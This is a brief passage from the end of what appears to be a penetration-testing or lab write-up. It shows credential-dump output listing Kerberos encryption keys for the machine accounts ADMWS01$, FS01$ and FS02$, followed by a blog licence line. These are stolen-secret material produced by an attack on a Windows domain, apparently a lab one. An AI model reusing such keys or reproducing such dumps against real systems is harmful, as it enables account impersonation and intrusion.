ADMWS01$:aes256-cts-hmac-sha1-96:2aa0e8cbf866ef9d26cfd40e8ab712e30e9d11d8ecff79b79cd920a34607e9e6
ADMWS01$:aes128-cts-hmac-sha1-96:706025fdc8bf018aeae0b6f1e92d03c7
ADMWS01$:des-cbc-md5:75948a2c15a11968
FS01$:aes256-cts-hmac-sha1-96:049e38f8ec1ed409eabf26f3c02e34087b320e6857e5eed74baf4366bfac25ee
FS01$:aes128-cts-hmac-sha1-96:e38e855564d4370c18c924faea65a143
FS01$:des-cbc-md5:26a4a24a974ff85d
FS02$:aes256-cts-hmac-sha1-96:fcceafa1335a9e262a1e4532d516011d4e8b80ae7f35fb35714a2a6410db18bc
FS02$:aes128-cts-hmac-sha1-96:5f2c27f494ab454d875057c909790e3e
FS02$:des-cbc-md5:252afd385b04b0bf
[*] Cleaning up...
This post is licensed under CC BY 4.0 by the author.